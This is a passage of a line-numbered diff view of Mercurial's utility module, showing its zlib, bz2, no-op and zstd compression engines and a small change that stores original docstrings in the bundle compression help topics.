3429 3429 return compewireprotosupport('zlib', 20, 20)
3430 3430
3431 3431 def revlogheader(self):
3432 3432 return 'x'
3433 3433
3434 3434 def compressstream(self, it, opts=None):
3435 3435 opts = opts or {}
3436 3436
3437 3437 z = zlib.compressobj(opts.get('level', -1))
3438 3438 for chunk in it:
3439 3439 data = z.compress(chunk)
3440 3440 # Not all calls to compress emit data. It is cheaper to inspect
3441 3441 # here than to feed empty chunks through generator.
3442 3442 if data:
3443 3443 yield data
3444 3444
3445 3445 yield z.flush()
3446 3446
3447 3447 def decompressorreader(self, fh):
3448 3448 def gen():
3449 3449 d = zlib.decompressobj()
3450 3450 for chunk in filechunkiter(fh):
3451 3451 while chunk:
3452 3452 # Limit output size to limit memory.
3453 3453 yield d.decompress(chunk, 2 ** 18)
3454 3454 chunk = d.unconsumed_tail
3455 3455
3456 3456 return chunkbuffer(gen())
3457 3457
3458 3458 class zlibrevlogcompressor(object):
3459 3459 def compress(self, data):
3460 3460 insize = len(data)
3461 3461 # Caller handles empty input case.
3462 3462 assert insize > 0
3463 3463
3464 3464 if insize < 44:
3465 3465 return None
3466 3466
3467 3467 elif insize <= 1000000:
3468 3468 compressed = zlib.compress(data)
3469 3469 if len(compressed) < insize:
3470 3470 return compressed
3471 3471 return None
3472 3472
3473 3473 # zlib makes an internal copy of the input buffer, doubling
3474 3474 # memory usage for large inputs. So do streaming compression
3475 3475 # on large inputs.
3476 3476 else:
3477 3477 z = zlib.compressobj()
3478 3478 parts = []
3479 3479 pos = 0
3480 3480 while pos < insize:
3481 3481 pos2 = pos + 2**20
3482 3482 parts.append(z.compress(data[pos:pos2]))
3483 3483 pos = pos2
3484 3484 parts.append(z.flush())
3485 3485
3486 3486 if sum(map(len, parts)) < insize:
3487 3487 return ''.join(parts)
3488 3488 return None
3489 3489
3490 3490 def decompress(self, data):
3491 3491 try:
3492 3492 return zlib.decompress(data)
3493 3493 except zlib.error as e:
3494 3494 raise error.RevlogError(_('revlog decompress error: %s') %
3495 3495 str(e))
3496 3496
3497 3497 def revlogcompressor(self, opts=None):
3498 3498 return self.zlibrevlogcompressor()
3499 3499
3500 3500 compengines.register(_zlibengine())
3501 3501
3502 3502 class _bz2engine(compressionengine):
3503 3503 def name(self):
3504 3504 return 'bz2'
3505 3505
3506 3506 def bundletype(self):
3507 3507 """An algorithm that produces smaller bundles than ``gzip``.
3508 3508
3509 3509 All Mercurial clients should support this format.
3510 3510
3511 3511 This engine will likely produce smaller bundles than ``gzip`` but
3512 3512 will be significantly slower, both during compression and
3513 3513 decompression.
3514 3514
3515 3515 If available, the ``zstd`` engine can yield similar or better
3516 3516 compression at much higher speeds.
3517 3517 """
3518 3518 return 'bzip2', 'BZ'
3519 3519
3520 3520 # We declare a protocol name but don't advertise by default because
3521 3521 # it is slow.
3522 3522 def wireprotosupport(self):
3523 3523 return compewireprotosupport('bzip2', 0, 0)
3524 3524
3525 3525 def compressstream(self, it, opts=None):
3526 3526 opts = opts or {}
3527 3527 z = bz2.BZ2Compressor(opts.get('level', 9))
3528 3528 for chunk in it:
3529 3529 data = z.compress(chunk)
3530 3530 if data:
3531 3531 yield data
3532 3532
3533 3533 yield z.flush()
3534 3534
3535 3535 def decompressorreader(self, fh):
3536 3536 def gen():
3537 3537 d = bz2.BZ2Decompressor()
3538 3538 for chunk in filechunkiter(fh):
3539 3539 yield d.decompress(chunk)
3540 3540
3541 3541 return chunkbuffer(gen())
3542 3542
3543 3543 compengines.register(_bz2engine())
3544 3544
3545 3545 class _truncatedbz2engine(compressionengine):
3546 3546 def name(self):
3547 3547 return 'bz2truncated'
3548 3548
3549 3549 def bundletype(self):
3550 3550 return None, '_truncatedBZ'
3551 3551
3552 3552 # We don't implement compressstream because it is hackily handled elsewhere.
3553 3553
3554 3554 def decompressorreader(self, fh):
3555 3555 def gen():
3556 3556 # The input stream doesn't have the 'BZ' header. So add it back.
3557 3557 d = bz2.BZ2Decompressor()
3558 3558 d.decompress('BZ')
3559 3559 for chunk in filechunkiter(fh):
3560 3560 yield d.decompress(chunk)
3561 3561
3562 3562 return chunkbuffer(gen())
3563 3563
3564 3564 compengines.register(_truncatedbz2engine())
3565 3565
3566 3566 class _noopengine(compressionengine):
3567 3567 def name(self):
3568 3568 return 'none'
3569 3569
3570 3570 def bundletype(self):
3571 3571 """No compression is performed.
3572 3572
3573 3573 Use this compression engine to explicitly disable compression.
3574 3574 """
3575 3575 return 'none', 'UN'
3576 3576
3577 3577 # Clients always support uncompressed payloads. Servers don't because
3578 3578 # unless you are on a fast network, uncompressed payloads can easily
3579 3579 # saturate your network pipe.
3580 3580 def wireprotosupport(self):
3581 3581 return compewireprotosupport('none', 0, 10)
3582 3582
3583 3583 # We don't implement revlogheader because it is handled specially
3584 3584 # in the revlog class.
3585 3585
3586 3586 def compressstream(self, it, opts=None):
3587 3587 return it
3588 3588
3589 3589 def decompressorreader(self, fh):
3590 3590 return fh
3591 3591
3592 3592 class nooprevlogcompressor(object):
3593 3593 def compress(self, data):
3594 3594 return None
3595 3595
3596 3596 def revlogcompressor(self, opts=None):
3597 3597 return self.nooprevlogcompressor()
3598 3598
3599 3599 compengines.register(_noopengine())
3600 3600
3601 3601 class _zstdengine(compressionengine):
3602 3602 def name(self):
3603 3603 return 'zstd'
3604 3604
3605 3605 @propertycache
3606 3606 def _module(self):
3607 3607 # Not all installs have the zstd module available. So defer importing
3608 3608 # until first access.
3609 3609 try:
3610 3610 from . import zstd
3611 3611 # Force delayed import.
3612 3612 zstd.__version__
3613 3613 return zstd
3614 3614 except ImportError:
3615 3615 return None
3616 3616
3617 3617 def available(self):
3618 3618 return bool(self._module)
3619 3619
3620 3620 def bundletype(self):
3621 3621 """A modern compression algorithm that is fast and highly flexible.
3622 3622
3623 3623 Only supported by Mercurial 4.1 and newer clients.
3624 3624
3625 3625 With the default settings, zstd compression is both faster and yields
3626 3626 better compression than ``gzip``. It also frequently yields better
3627 3627 compression than ``bzip2`` while operating at much higher speeds.
3628 3628
3629 3629 If this engine is available and backwards compatibility is not a
3630 3630 concern, it is likely the best available engine.
3631 3631 """
3632 3632 return 'zstd', 'ZS'
3633 3633
3634 3634 def wireprotosupport(self):
3635 3635 return compewireprotosupport('zstd', 50, 50)
3636 3636
3637 3637 def revlogheader(self):
3638 3638 return '\x28'
3639 3639
3640 3640 def compressstream(self, it, opts=None):
3641 3641 opts = opts or {}
3642 3642 # zstd level 3 is almost always significantly faster than zlib
3643 3643 # while providing no worse compression. It strikes a good balance
3644 3644 # between speed and compression.
3645 3645 level = opts.get('level', 3)
3646 3646
3647 3647 zstd = self._module
3648 3648 z = zstd.ZstdCompressor(level=level).compressobj()
3649 3649 for chunk in it:
3650 3650 data = z.compress(chunk)
3651 3651 if data:
3652 3652 yield data
3653 3653
3654 3654 yield z.flush()
3655 3655
3656 3656 def decompressorreader(self, fh):
3657 3657 zstd = self._module
3658 3658 dctx = zstd.ZstdDecompressor()
3659 3659 return chunkbuffer(dctx.read_from(fh))
3660 3660
3661 3661 class zstdrevlogcompressor(object):
3662 3662 def __init__(self, zstd, level=3):
3663 3663 # Writing the content size adds a few bytes to the output. However,
3664 3664 # it allows decompression to be more optimal since we can
3665 3665 # pre-allocate a buffer to hold the result.
3666 3666 self._cctx = zstd.ZstdCompressor(level=level,
3667 3667 write_content_size=True)
3668 3668 self._dctx = zstd.ZstdDecompressor()
3669 3669 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3670 3670 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3671 3671
3672 3672 def compress(self, data):
3673 3673 insize = len(data)
3674 3674 # Caller handles empty input case.
3675 3675 assert insize > 0
3676 3676
3677 3677 if insize < 50:
3678 3678 return None
3679 3679
3680 3680 elif insize <= 1000000:
3681 3681 compressed = self._cctx.compress(data)
3682 3682 if len(compressed) < insize:
3683 3683 return compressed
3684 3684 return None
3685 3685 else:
3686 3686 z = self._cctx.compressobj()
3687 3687 chunks = []
3688 3688 pos = 0
3689 3689 while pos < insize:
3690 3690 pos2 = pos + self._compinsize
3691 3691 chunk = z.compress(data[pos:pos2])
3692 3692 if chunk:
3693 3693 chunks.append(chunk)
3694 3694 pos = pos2
3695 3695 chunks.append(z.flush())
3696 3696
3697 3697 if sum(map(len, chunks)) < insize:
3698 3698 return ''.join(chunks)
3699 3699 return None
3700 3700
3701 3701 def decompress(self, data):
3702 3702 insize = len(data)
3703 3703
3704 3704 try:
3705 3705 # This was measured to be faster than other streaming
3706 3706 # decompressors.
3707 3707 dobj = self._dctx.decompressobj()
3708 3708 chunks = []
3709 3709 pos = 0
3710 3710 while pos < insize:
3711 3711 pos2 = pos + self._decompinsize
3712 3712 chunk = dobj.decompress(data[pos:pos2])
3713 3713 if chunk:
3714 3714 chunks.append(chunk)
3715 3715 pos = pos2
3716 3716 # Frame should be exhausted, so no finish() API.
3717 3717
3718 3718 return ''.join(chunks)
3719 3719 except Exception as e:
3720 3720 raise error.RevlogError(_('revlog decompress error: %s') %
3721 3721 str(e))
3722 3722
3723 3723 def revlogcompressor(self, opts=None):
3724 3724 opts = opts or {}
3725 3725 return self.zstdrevlogcompressor(self._module,
3726 3726 level=opts.get('level', 3))
3727 3727
3728 3728 compengines.register(_zstdengine())
3729 3729
3730 3730 def bundlecompressiontopics():
3731 3731 """Obtains a list of available bundle compressions for use in help."""
3732 3732 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3733 3733 items = {}
3734 3734
3735 3735 # We need to format the docstring. So use a dummy object/type to hold it
3736 3736 # rather than mutating the original.
3737 3737 class docobject(object):
3738 3738 pass
3739 3739
3740 3740 for name in compengines:
3741 3741 engine = compengines[name]
3742 3742
3743 3743 if not engine.available():
3744 3744 continue
3745 3745
3746 3746 bt = engine.bundletype()
3747 3747 if not bt or not bt[0]:
3748 3748 continue
3749 3749
3750 3750 doc = pycompat.sysstr('``%s``\n %s') % (
3751 3751 bt[0], engine.bundletype.__doc__)
3752 3752
3753 3753 value = docobject()
3754 3754 value.__doc__ = doc
3755 value._origdoc = engine.bundletype.__doc__
3756 value._origfunc = engine.bundletype
3755 3757
3756 3758 items[bt[0]] = value
3757 3759
3758 3760 return items
3759 3761
3760 3762 # convenient shortcut
3761 3763 dst = debugstacktrace
General Comments 0
You need to be logged in to leave comments. Login now